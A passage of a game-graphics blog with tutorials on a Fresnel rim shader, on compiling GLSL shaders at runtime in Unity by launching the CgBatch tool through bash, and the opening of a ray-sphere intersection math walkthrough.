<li>bias, scale and power are values exposed to allow control over the appearance of the Fresnel effect</li>
</ul>
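<p>Here is a rough CPU-side sketch of that equation in C#, using System.Numerics.Vector3 in place of shader types. The class and method names are made up for illustration. The extra Math.Max on the base of the power is my own guard against a slightly negative value from rounding, and isn’t part of the formula.</p>

```csharp
using System;
using System.Numerics;

public static class EmpiricalFresnel
{
    // R = max(0, min(1, bias + scale * (1 + I . N)^power))
    public static float Evaluate(Vector3 eyeToSurface, Vector3 normal,
                                 float bias, float scale, float power)
    {
        Vector3 i = Vector3.Normalize(eyeToSurface);
        Vector3 n = Vector3.Normalize(normal);

        // 1 + I.N is 0 when looking straight at the surface and 1 at a glancing angle.
        // Rounding can leave it a hair below 0, which would make Pow return NaN.
        float facing = Math.Max(0.0f, 1.0f + Vector3.Dot(i, n));

        float r = bias + scale * (float)Math.Pow(facing, power);
        return Math.Max(0.0f, Math.Min(1.0f, r));
    }

    public static void Main()
    {
        Vector3 normal = new Vector3(0, 0, 1);

        // Looking straight at the surface: I points opposite to N.
        Console.WriteLine(Evaluate(new Vector3(0, 0, -1), normal, 0f, 1f, 5f));

        // Glancing view: I is perpendicular to N.
        Console.WriteLine(Evaluate(new Vector3(1, 0, 0), normal, 0f, 1f, 5f));
    }
}
```

<p>With bias 0, scale 1 and power 5, the head-on view should evaluate to 0 (no Fresnel contribution) and the glancing view to 1 (full contribution). Raising power pulls the effect in towards the silhouette, while bias adds a constant amount everywhere.</p>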
<p>This equation is a bit of a double edged sword. It’s very easy to make hideous looking Fresnel by tweaking the values of bias, scale and power, but it also gives you the ability to fine tune your materials to exactly how you want them to look.</p>
<div align="center">
<img src="/images/post_images/2014-02-23/UglyFresnel.png" /><br />
<font size="2">Fresnel gone wrong</font>
</div>
<p><br /></p>
<h2>A Fresnel Shader</h2>
<p>So what does this look like in a shader? It’s actually very simple. First, you need to calculate the value of R. For this example, we’ll do that in the vertex shader:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">vOUT</span> <span class="nf">vert</span><span class="p">(</span><span class="n">vIN</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vOUT</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">texcoord</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">posWorld</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">_Object2World</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">).</span><span class="n">xyz</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normWorld</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">mul</span><span class="p">(</span><span class="n">float3x3</span><span class="p">(</span><span class="n">_Object2World</span><span class="p">),</span> <span class="n">v</span><span class="p">.</span><span class="n">normal</span><span class="p">));</span>
<span class="n">float3</span> <span class="n">I</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">posWorld</span> <span class="o">-</span> <span class="n">_WorldSpaceCameraPos</span><span class="p">.</span><span class="n">xyz</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">R</span> <span class="o">=</span> <span class="n">_Bias</span> <span class="o">+</span> <span class="n">_Scale</span> <span class="o">*</span> <span class="n">pow</span><span class="p">(</span><span class="mf">1.0</span> <span class="o">+</span> <span class="n">dot</span><span class="p">(</span><span class="n">I</span><span class="p">,</span> <span class="n">normWorld</span><span class="p">),</span> <span class="n">_Power</span><span class="p">);</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>There isn’t too much to say about this, since it’s pretty much the equation above verbatim. One handy tip though: I’ve found that I’ve been perfectly happy with the results I get if I omit the bias parameter entirely, and doing so makes it more difficult to produce wonky results.</p>
<p>Once you have the R value calculated, the rest of the implementation is just a lerp in the fragment shader:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">float4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">col</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">xy</span> <span class="o">*</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">xy</span> <span class="o">+</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">zw</span><span class="p">);</span>
<span class="k">return</span> <span class="nf">lerp</span><span class="p">(</span><span class="n">col</span><span class="p">,</span><span class="n">_Color</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">R</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>If you’re not a Unity programmer, ignore all the _MainTex_ST stuff; that’s just a Unity-specific bit of code to handle tiling textures across an object.</p>
<p>Otherwise, all that’s new here is the lerp function. In this example, rather than reflecting anything, our Fresnel Rim is just a single color (_Color), but the principle is the same. If you wanted to turn the rim into a reflection, you’d simply replace the _Color variable with a color sampled from a cube map, or taken from a camera, or however else you want to pass in a reflection.</p>
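<p>If lerp is new to you, it is just a linear blend: lerp(a, b, t) = a + t * (b - a). The sketch below spells that out on the CPU with System.Numerics.Vector4 standing in for float4. The two colors are made-up stand-ins for the texture sample and _Color.</p>

```csharp
using System;
using System.Numerics;

public static class FresnelBlend
{
    // Same definition as the shader intrinsic: lerp(a, b, t) = a + t * (b - a).
    public static Vector4 Lerp(Vector4 a, Vector4 b, float t)
    {
        return a + (b - a) * t;
    }

    public static void Main()
    {
        Vector4 surface = new Vector4(0.2f, 0.4f, 0.6f, 1.0f); // stand-in for the texture sample
        Vector4 rim = new Vector4(1.0f, 1.0f, 1.0f, 1.0f);     // stand-in for _Color

        // R = 0 keeps the surface color, R = 1 is pure rim color, 0.5 is halfway.
        foreach (float r in new[] { 0.0f, 0.5f, 1.0f })
            Console.WriteLine(Lerp(surface, rim, r));
    }
}
```

<p>This is also why an R value outside the 0 to 1 range produces odd colors: the blend overshoots past one of the two inputs instead of stopping at it.</p>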
<p>That’s all there is to writing a simple Fresnel shader, so go forth and make all of your objects more believable! And feel free to download the Fresnel Shader Pack that I’ve posted in the graphics section of this site to see some examples of more complicated Fresnel effects.</p>
<p>If you’ve spotted an error on here, or have anything to add, feel free to send me a message <a href="http://twitter.com/khalladay">on twitter</a>. Happy shading!</p>
Creating GLSL Shaders at Runtime in Unity3D2014-01-12T00:00:00+00:00http://kylehalladay.com/blog/tutorial/bestof/2014/01/12/Runtime-Shader-Compilation-Unity<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore. Beware!
</div>
<p><br /></p>
<p>The feeling of solving a problem that seems potentially impossible is awesome. My latest project is no exception.</p>
<p>The concept involves users being able to write shaders while the program is running, and compiling them at runtime onto objects in the scene. Normally this wouldn’t be an unreasonable task, however this project is being built in Unity, which complicates things immensely.</p>
<p>I had seen an example of shaderlab code being passed to the Material constructor at runtime before, but I hadn’t ever seen anyone play around with any other shader language in the same way. It turns out that’s because you can’t. The <a href="http://docs.unity3d.com/Documentation/ScriptReference/Material-ctor.html">Material constructor</a> that I was hoping to use only accepts Shaderlab; Unity doesn’t support runtime compilation of GLSL, Cg, or HLSL, end of story.</p>
<p>Except that isn’t the whole story. If it was, this would be a very short post. It turns out that with some elbow grease, you can actually get other languages (or at least GLSL) to compile. The rest of this post is going to show you how.</p>
<div align="center">
<img src="/images/post_images/2014-01-20/shadercompilation.png" /><br />
<font size="2">Type the fragment shader into the box, hit the button, watch the magic happen</font>
</div>
<p><br /></p>
<h3>Setting Up Your Project</h3>
<p>There are at least a few people who have tried to make this work before. A quick google search for “runtime shader compilation unity” will bring you to <a href="http://forum.unity3d.com/threads/87085-Runtime-shader-compilation">this Unity forum post</a>. If you scroll down you’ll find a post from a user named Sirithang, who is the real unsung hero of this post.</p>
<p>Their post talks about a tool called CgBatch, which is included with Unity, and according to <a href="http://www.realtimerendering.com/downloads/MobileCrossPlatformChallenges_siggraph.pdf">this SIGGRAPH presentation</a>, is either the entire shader compilation pipeline for Unity, or is at least one step in it. The siggraph link only describes it as a tool to generate HLSL, but in practice it seems to fully translate shaders into a format accepted by that material constructor from above. Since CgBatch isn’t meant for public use, there isn’t anything in the way of documentation to know for sure.</p>
<p>Ok, so we know we need to use CgBatch, but where do we get it? On Mac, you can find it inside of Unity.app (right click and select “Show Package Contents”), inside the Tools folder. On Windows, you’re looking for CgBatch.exe, located in Unity/Editor/Data/Tools (thanks to <a href="https://twitter.com/izaleu">@izaleu</a> for finding this on Windows :D ). Create a folder inside your project’s StreamingAssets directory and paste CgBatch into it (it must be inside a subdirectory of StreamingAssets).</p>
<p>CgBatch also relies on Cg.framework, which you can find in the Unity.app/Contents/Frameworks folder. If you try to run CgBatch however, you’ll notice that it actually relies on Cg.framework being located in “../Frameworks/Cg.framework”, so copy and paste the entire folder into your project’s StreamingAssets folder.</p>
<p>Finally, you will need to provide a path to the CGInclude files as part of using CgBatch, and since we don’t want our users to have to have Unity installed to use our program, you will also need to copy the CGIncludes folder to your StreamingAssets directory.</p>
<p><strong>Aside:</strong> If you’ve never used the StreamingAssets folder before, it is simply a folder named “StreamingAssets” that you place in your project’s Assets folder. Everything in this folder will be included exactly as is in your built project, at Application.streamingAssetsPath.</p>
<h3>Deciphering CgBatch</h3>
<p>So how do you use CgBatch? If you’ve attempted to run it from the command line, you’ve probably seen the following message:
<br /></p>
<div align="center">
<i>E -1: Failed to launch CgBatch (incorrect parameters). Usage: CgBatch input path includepath output [-xbox360] [-ps3]</i>
</div>
<p><br />
So CgBatch needs at least 4 parameters. Based on the forum post linked previously, these arguments are as follows:</p>
<ul>
<li><strong>input</strong> : The path to your uncompiled shader file</li>
<li><strong>path</strong> : The path to the directory that contains your shader</li>
<li><strong>includepath</strong> : The path to the CGInclude files for Unity</li>
<li><strong>output</strong> : Where to put the output shader file.</li>
</ul>
<p>If you run this with the appropriate parameters, you should be able to get output that can be accepted by the Material shader string constructor, which is great! So now we need to be able to do this inside a running program.</p>
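<p>Since the order of those four parameters is easy to mix up, here is a tiny sketch of a helper that assembles them in the order the usage message lists them. The helper and the paths in Main are hypothetical. It simply refuses paths containing whitespace rather than trying to quote them, which is an assumption made to keep the example short.</p>

```csharp
using System;

public static class CgBatchArguments
{
    // Joins the four required parameters in usage order: input path includepath output.
    public static string Build(string input, string path, string includePath, string output)
    {
        string[] parts = { input, path, includePath, output };
        foreach (string part in parts)
        {
            if (string.IsNullOrEmpty(part))
                throw new ArgumentException("All four CgBatch parameters are required.");
            // Unquoted paths with spaces would be split into extra arguments.
            if (part.Contains(" ") || part.Contains("\t"))
                throw new ArgumentException("Path contains whitespace: " + part);
        }
        return string.Join(" ", parts);
    }

    public static void Main()
    {
        // Made-up paths, purely for illustration.
        Console.WriteLine(Build("/tmp/in.shader", "/tmp/", "/tmp/CGIncludes/", "/tmp/out.shader"));
    }
}
```

<p>The resulting string is what gets appended after the CgBatch executable path when building the command line.</p>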
<h3>Introducing System.Diagnostics</h3>
<p>Thankfully, Mono has us covered (even on Mac!). The Process class (inside System.Diagnostics) is designed to launch external programs such as command line applications, and can be configured to execute programs in bash as well as the Windows command line.</p>
<p>The way to do this is to create a new Process object, and use that object’s StartInfo property to specify exactly what command and arguments you wish to execute, and then call Process.Start();</p>
<p>In practice, this looks like the following:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">using</span> <span class="nn">System.Diagnostics</span><span class="p">;</span>
<span class="n">Process</span> <span class="n">process</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Process</span><span class="p">();</span>
<span class="n">process</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">FileName</span> <span class="p">=</span> <span class="s">"bash"</span><span class="p">;</span>
<span class="n">process</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">Arguments</span> <span class="p">=</span> <span class="s">"-c '"</span> <span class="p">+</span> <span class="p">[</span><span class="n">Command</span><span class="p">]</span> <span class="p">[</span><span class="n">arg1</span><span class="p">]</span> <span class="p">[</span><span class="n">arg2</span><span class="p">]</span> <span class="p">...</span> <span class="p">+</span><span class="s">"'"</span><span class="p">;</span>
<span class="n">process</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">RedirectStandardOutput</span> <span class="p">=</span> <span class="k">true</span><span class="p">;</span>
<span class="n">process</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">UseShellExecute</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="n">process</span><span class="p">.</span><span class="nf">Start</span><span class="p">();</span></code></pre></figure>
<p>(the above is Mac specific, I don’t have a Windows machine to try this stuff out on right now)</p>
<p>As shown above, the name of the command that you need to execute is actually bash, and not CgBatch. In order to execute a command from bash, you need to pass it as an argument to bash using the -c flag, enclosing the command and all its arguments inside single quotes.</p>
<p>Setting RedirectStandardOutput to true allows us to read the output of the command into the Unity console (really handy for debugging), but in order for that to work, UseShellExecute needs to be set to false, which means that we will not be using the operating system shell to launch the program (in this case bash), we will launch bash directly.</p>
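<p>To try the Process setup on its own before involving CgBatch, here is a minimal standalone sketch that runs a harmless echo through bash and captures what it prints. It assumes bash is on the PATH, and the BashRunner name is made up. One deliberate difference from the snippet above: it wraps the command in double quotes instead of single quotes, because as far as I know not every .NET runtime treats single quotes as quoting when it splits the Arguments string. It also assumes the command itself contains no double quotes or backslashes.</p>

```csharp
using System;
using System.Diagnostics;

public static class BashRunner
{
    // Runs a command line through `bash -c` and returns whatever it wrote to stdout.
    public static string Run(string commandLine)
    {
        using (var process = new Process())
        {
            process.StartInfo.FileName = "bash";
            // Assumption: commandLine has no double quotes or backslashes in it.
            process.StartInfo.Arguments = "-c \"" + commandLine + "\"";
            process.StartInfo.RedirectStandardOutput = true; // lets us read the output
            process.StartInfo.UseShellExecute = false;       // required for redirection
            process.Start();

            // Read before waiting, so a large output cannot fill the pipe and stall the child.
            string output = process.StandardOutput.ReadToEnd();
            process.WaitForExit();
            return output;
        }
    }

    public static void Main()
    {
        Console.Write(Run("echo hello from bash"));
    }
}
```

<p>Once this works, swapping the echo for the CgBatch command line is the only change needed. Checking process.ExitCode after WaitForExit is a cheap way to notice when the tool fails.</p>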
<h3>Actually Making This Work</h3>
<p>Now that we have our tools set up and we know how to execute CgBatch, it’s time to put it all together.</p>
<p>For the proof of concept, I only wanted users to write fragment shaders, so I needed to provide a vertex shader for them:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">
<span class="kt">string</span> <span class="n">prefix</span> <span class="p">=</span> <span class="s">"Shader \"Temp\"{\nProperties{\n}\nSubShader {"</span> <span class="p">+</span>
<span class="s">"\nTags { \"Queue\" = \"Geometry\" }\nPass {\nGLSLPROGRAM\n#ifdef VERTEX\n"</span> <span class="p">+</span>
<span class="s">"void main(){\n"</span> <span class="p">+</span>
<span class="s">"gl_Position = gl_ModelViewProjectionMatrix * gl_Vertex;\n"</span> <span class="p">+</span>
<span class="s">"}\n"</span> <span class="p">+</span>
<span class="s">"#endif\n"</span> <span class="p">+</span>
<span class="s">"#ifdef FRAGMENT\n"</span> <span class="p">+</span>
<span class="s">"uniform float _time;\n"</span><span class="p">;</span>
</code></pre></figure>
<p>The above example is for writing a glsl shader at runtime. I haven’t yet been able to get Cg compiling using the method presented in this post, but I’m sure it can be done with the right arguments to CgBatch.</p>
<p>You’ll notice I’m also including a uniform for time (_time). This is because I have yet to figure out how to get Unity’s specific constants to be recognized in the user-written shader, and time is useful enough that I’m passing it in myself (just call Shader.SetGlobalFloat in Update to do the same).</p>
<p>Next up, we need to write the code that will come after the user’s fragment shader to finish off the shader file:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">
<span class="kt">string</span> <span class="n">suffix</span> <span class="p">=</span> <span class="s">"\n#endif\nENDGLSL}}}"</span><span class="p">;</span></code></pre></figure>
<p>As the variable names suggest, the user’s fragment shader will be positioned in between these two strings when building our input file.</p>
<p>Get the user input however you see fit (as the picture earlier showed, I’m using Unity.GUI for now), and then assemble the full file string with prefix+USERINPUT+suffix.</p>
<p>Once you’ve assembled the full shader string, you need to write it to a file, since CgBatch expects the input parameter to be a file path. Since we don’t want this file to persist between runs, I’m writing the input file to Application.temporaryCachePath.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">
<span class="kt">byte</span><span class="p">[]</span> <span class="n">byteShader</span> <span class="p">=</span> <span class="n">System</span><span class="p">.</span><span class="n">Text</span><span class="p">.</span><span class="n">Encoding</span><span class="p">.</span><span class="n">UTF8</span><span class="p">.</span><span class="nf">GetBytes</span><span class="p">(</span><span class="n">prefix</span><span class="p">+</span><span class="n">shader</span><span class="p">+</span><span class="n">suffix</span><span class="p">);</span>
<span class="kt">var</span> <span class="n">tempShader</span> <span class="p">=</span> <span class="n">File</span><span class="p">.</span><span class="nf">Create</span><span class="p">(</span><span class="n">Application</span><span class="p">.</span><span class="n">temporaryCachePath</span><span class="p">+</span><span class="s">"/tempshader.shader"</span><span class="p">);</span>
<span class="n">tempShader</span><span class="p">.</span><span class="nf">Write</span><span class="p">(</span><span class="n">byteShader</span><span class="p">,</span><span class="m">0</span><span class="p">,</span><span class="n">byteShader</span><span class="p">.</span><span class="n">Length</span><span class="p">);</span> <span class="c1">//use the byte count: it can differ from the string length for non-ASCII text</span>
<span class="n">tempShader</span><span class="p">.</span><span class="nf">Close</span><span class="p">();</span></code></pre></figure>
<p>Finally, we need to read in the output and actually build a material out of it. All together, the shader compilation process looks like the following:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">
<span class="kt">byte</span><span class="p">[]</span> <span class="n">byteShader</span> <span class="p">=</span> <span class="n">System</span><span class="p">.</span><span class="n">Text</span><span class="p">.</span><span class="n">Encoding</span><span class="p">.</span><span class="n">UTF8</span><span class="p">.</span><span class="nf">GetBytes</span><span class="p">(</span><span class="n">prefix</span><span class="p">+</span><span class="n">shader</span><span class="p">+</span><span class="n">suffix</span><span class="p">);</span>
<span class="kt">var</span> <span class="n">tempShader</span> <span class="p">=</span> <span class="n">File</span><span class="p">.</span><span class="nf">Create</span><span class="p">(</span><span class="n">Application</span><span class="p">.</span><span class="n">temporaryCachePath</span><span class="p">+</span><span class="s">"/tempshader.shader"</span><span class="p">);</span>
<span class="n">tempShader</span><span class="p">.</span><span class="nf">Write</span><span class="p">(</span><span class="n">byteShader</span><span class="p">,</span><span class="m">0</span><span class="p">,</span><span class="n">byteShader</span><span class="p">.</span><span class="n">Length</span><span class="p">);</span> <span class="c1">//use the byte count: it can differ from the string length for non-ASCII text</span>
<span class="n">tempShader</span><span class="p">.</span><span class="nf">Close</span><span class="p">();</span>
<span class="n">Process</span> <span class="n">compileProcess</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Process</span><span class="p">();</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">FileName</span> <span class="p">=</span> <span class="s">"bash"</span><span class="p">;</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">Arguments</span> <span class="p">=</span> <span class="s">"-c '"</span>
<span class="p">+</span><span class="n">Application</span><span class="p">.</span><span class="n">streamingAssetsPath</span>
<span class="p">+</span><span class="s">"/Tools/CGBatch "</span>
<span class="p">+</span><span class="n">Application</span><span class="p">.</span><span class="n">temporaryCachePath</span>
<span class="p">+</span><span class="s">"/tempshader.shader ../CGIncludes/ ../CGIncludes/"</span>
<span class="p">+</span><span class="n">Application</span><span class="p">.</span><span class="n">temporaryCachePath</span>
<span class="p">+</span><span class="s">"/testOutput.shader'"</span><span class="p">;</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">RedirectStandardOutput</span> <span class="p">=</span> <span class="k">true</span><span class="p">;</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">UseShellExecute</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="nf">Start</span><span class="p">();</span>
<span class="kt">var</span> <span class="n">output</span> <span class="p">=</span> <span class="n">compileProcess</span><span class="p">.</span><span class="n">StandardOutput</span><span class="p">.</span><span class="nf">ReadToEnd</span><span class="p">();</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="nf">WaitForExit</span><span class="p">();</span>
<span class="kt">string</span> <span class="n">compiled</span> <span class="p">=</span> <span class="n">File</span><span class="p">.</span><span class="nf">ReadAllText</span><span class="p">(</span><span class="n">Application</span><span class="p">.</span><span class="n">temporaryCachePath</span>
<span class="p">+</span><span class="s">"/testOutput.shader"</span><span class="p">);</span>
<span class="n">Material</span> <span class="n">m</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Material</span><span class="p">(</span><span class="n">compiled</span><span class="p">);</span>
<span class="n">cube</span><span class="p">.</span><span class="n">renderer</span><span class="p">.</span><span class="n">material</span> <span class="p">=</span> <span class="n">m</span><span class="p">;</span>
<span class="n">UnityEngine</span><span class="p">.</span><span class="n">Debug</span><span class="p">.</span><span class="nf">Log</span><span class="p">(</span><span class="n">output</span><span class="p">);</span></code></pre></figure>
<p>The above has only been tested on Mac. On Windows, you will need to replace “bash” with “cmd” and the arguments with whatever is appropriate for your system. I unfortunately don’t have a Windows machine to test it out (again, send me a message <a href="http://twitter.com/khalladay">on twitter</a> and I’ll update this).</p>
<p>But, provided you’re on Mac, or have figured out the Windows changes, you should now be able to compile GLSL at runtime! You laugh in the face of Unity not supporting this feature!</p>
<p>You may also notice that your build product is 50MB larger than you expect. This is because we’re including all of Cg.framework with our project so that CgBatch can use it during compilation. I expect that this extra file size is one of a number of reasons that Unity has opted to leave this feature out by default.</p>
<p>That’s all for now! Hopefully this wall of text has opened up a whole world of experimental gameplay to you! I’d love to hear about any improvements to the above, any further knowledge about CgBatch, and especially any other tricks like this that allow weird stuff to be done in my favourite engine, so as I’ve said twice already, <a href="http://twitter.com/khalladay">TWITTER!</a></p>
Ray-Sphere Intersection with Simple Math2013-12-24T00:00:00+00:00http://kylehalladay.com/blog/tutorial/math/2013/12/24/Ray-Sphere-Intersection<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>Lately I’ve been working on a ray tracer. It’s been going well (or at least as well as I could hope my first renderer could go), but it has been a slow process. I don’t have a formal math background - my day to day work only ever goes as far as enough linear algebra to write shaders, and enough of everything else to implement whatever gameplay I need - and none of this prepared me for the endless pages of ray tracing resources that expected much more math knowledge than I have.</p>
<div align="center">
<img src="/images/post_images/2013-12-24/traceoutput.png" /><br />
<font size="2">
The current output of my ray tracer
</font>
</div>
<p><br /></p>
<p>So I thought that I’d do my part for the next person who starts writing a ray tracer, and share a bit of what I’ve figured out in as much detail as possible, as clearly as possible.</p>
<p>As the title of this post suggests, the end product of this post will be a function which will take a ray and a sphere, and return both whether they intersect and, if so, the location of the intersection(s).</p>
<h2>What you need to know before starting</h2>
<p>I’m going to try to keep things as basic as possible. In order to follow this post, you’ll need:</p>
<ul>
<li>a basic understanding of trigonometry</li>
<li>a good handle on vector math (including dot products)</li>
</ul>
<p>Have you got that? Good! If not, there are a bazillion resources online, go check one of them out before proceeding.</p>
<h2>Representing our objects</h2>
<p>The first thing we need to get a handle on is how to best represent a ray. If you recall from high school geometry, a ray consists of a single point (the origin), and extends from that origin indefinitely along a direction vector. So for our purposes, a ray is simply a struct which consists of an origin vector and a direction vector.</p>
<pre><code>struct Ray
{
vec3 origin;
vec3 direction;
};
</code></pre>
<p>With these 2 vectors, we can represent any point on the ray like this:</p>
<div align="center">
Origin + Direction * t = Point
</div>
<p><br />
Each point will have a specific t value, representing how far along the direction vector the point lies, but the equation remains the same otherwise. This will be important later, so make sure that you try this out on paper and really understand it before proceeding.</p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere2.png" /><br />
</div>
<p><br /></p>
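<p>To make the ray equation concrete, here is a minimal sketch of it in code. The <code>Vec3</code> type, its operators and the <code>pointAt</code> helper are stand-ins invented for this example (the post assumes you already have some <code>vec3</code> type), so treat them as assumptions rather than a real library:</p>

```cpp
// Minimal stand-in for the post's vec3 type (an assumption, not a real library).
struct Vec3 { float x, y, z; };

Vec3 operator+(Vec3 a, Vec3 b) { return {a.x + b.x, a.y + b.y, a.z + b.z}; }
Vec3 operator*(Vec3 v, float s) { return {v.x * s, v.y * s, v.z * s}; }

struct Ray
{
    Vec3 origin;
    Vec3 direction;
};

// Hypothetical helper: Origin + Direction * t = Point
Vec3 pointAt(const Ray& r, float t)
{
    return r.origin + r.direction * t;
}
```

<p>For example, a ray starting at (1, 2, 3) and pointing along +z reaches (1, 2, 5) at t = 2.</p>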
<p>Spheres are even simpler. Given that spheres don’t have a direction, all we need is the location of the center point, and the radius of the sphere. This means our sphere object will simply be a struct containing one vector and one float.</p>
<pre><code>struct Sphere
{
vec3 center;
float radius;
};
</code></pre>
<h2>Turning Vectors into Scalar Values</h2>
<p><br /></p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere1.png" /><br />
</div>
<p><br /></p>
<p>Alright, so the image above shows the general lay of the problem. We have a ray and a sphere; we know the ray’s origin point and its direction, and we know the location of the sphere’s center point. What we want to do is determine if the ray will ever intersect the sphere (spoiler: in this tutorial, it will), and if so, where that intersection occurs.</p>
<p>There are 2 points that I haven’t mentioned yet, labelled above as P1 and P2. These are the points that we want to solve for, as both of these represent a point of intersection.</p>
<p>Speaking of those points, remember that we can solve for any point on a ray with the following equation:</p>
<div align="center">
Origin + Direction * t = Point
</div>
<p><br />
So, in order to get the locations of P1 and P2, all we need to do is find the correct t value for each of them. This is going to make our lives a lot easier, provided you remember a bit of trig (don’t worry, I didn’t either, we’ll go over it as we get to it), since now all we need to do is find 1 number for each point, instead of their exact co-ordinates.</p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere1-2.png" /><br />
</div>
<p><br /></p>
<p>While we’re identifying values to solve for, there are two more t values that are important to us, shown below in blue and green. tc is the distance from the origin to a point on the ray halfway between the 2 intersection points, and t1c is the distance between t1 and tc. We’ll see why these are important in a minute.</p>
<p>To review, these t values have been labelled t1, t2, tc and t1c. t1 and t2 correspond to the points P1 and P2 on our diagram, tc represents the t value of the point halfway between them, and t1c is the distance between P1 and that halfway point.</p>
<h2>Finding tc</h2>
<p>As the headline suggests, the first value we need to solve for is tc. As the diagram below shows, the first step to finding tc is to create a right angle triangle, using tc, the vector from the ray’s origin to the sphere’s center (L), and a line (d) from the center to the ray.</p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere4.png" /><br />
</div>
<p><br /></p>
<p>The first thing we need to find is L, the vector from the ray’s origin to the sphere’s center. This is simple enough, since we know the positions of both the center and ray origin.</p>
<div align="center">
L = C - Origin
</div>
<p><br /></p>
<p>Once we have L, we can use the dot product between L and the ray’s direction (which needs to be normalized for this to work) in order to get the value for tc. Don’t worry if this seems unintuitive, it had been a while since I used the dot product for projections too. Luckily there are lots of good resources out there that explain this concept (like this one). Moving on though, this means that we have found the value for tc:</p>
<div align="center">
tc = L · Direction
</div>
<p><br /></p>
<p>This is an important calculation. If tc is less than 0, the sphere’s center is behind the ray’s origin, so (as long as the ray doesn’t start inside the sphere) the ray does not intersect the sphere, and we can bail out of our intersection test early. If it’s not less than 0, we move on.</p>
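<p>Here is a rough sketch of the tc step on its own. <code>Vec3</code>, <code>normalize</code> and <code>solveTc</code> are names made up for this example, and the sketch normalizes the direction itself because the dot product only gives a distance along the ray when the direction has unit length:</p>

```cpp
#include <cmath>

// Minimal stand-in for the post's vec3 type (an assumption, not a real library).
struct Vec3 { float x, y, z; };

Vec3 operator-(Vec3 a, Vec3 b) { return {a.x - b.x, a.y - b.y, a.z - b.z}; }
float dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }

// Scale v to unit length; assumes v is not the zero vector.
Vec3 normalize(Vec3 v)
{
    float invLen = 1.0f / std::sqrt(dot(v, v));
    return {v.x * invLen, v.y * invLen, v.z * invLen};
}

// Hypothetical helper: project L = C - Origin onto the ray's direction.
float solveTc(Vec3 origin, Vec3 direction, Vec3 center)
{
    Vec3 L = center - origin;
    return dot(L, normalize(direction));
}
```

<p>A negative result means the sphere’s center sits behind the ray’s origin, which is the early-out case described above.</p>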
<p>The last thing we need to do with this triangle is solve for the length of d. This isn’t important for tc, but will be in the next section, so we may as well do it now while we’re still thinking about this triangle.</p>
<p>To solve for d, we need to bust out some high school math. If you’re like me, you’ll need a bit of a refresher on this, and I found that it was helpful to rotate our triangle around a bit to put it in a more familiar orientation.</p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere5.png" /><br />
</div>
<p><br /></p>
<p>Looking familiar yet? If you can remember Pythagoras’ Theorem, you’ll already know where I’m going with this. If not, I’ll help:</p>
<div align="center">
a² + b² = c²
</div>
<p><br /></p>
<p>We need to find d, which in this case is edge b, so we need to rearrange the equation a bit:</p>
<div align="center">
b² = c² - a²<br />
b = √(c² - a²)<br />
</div>
<p><br /></p>
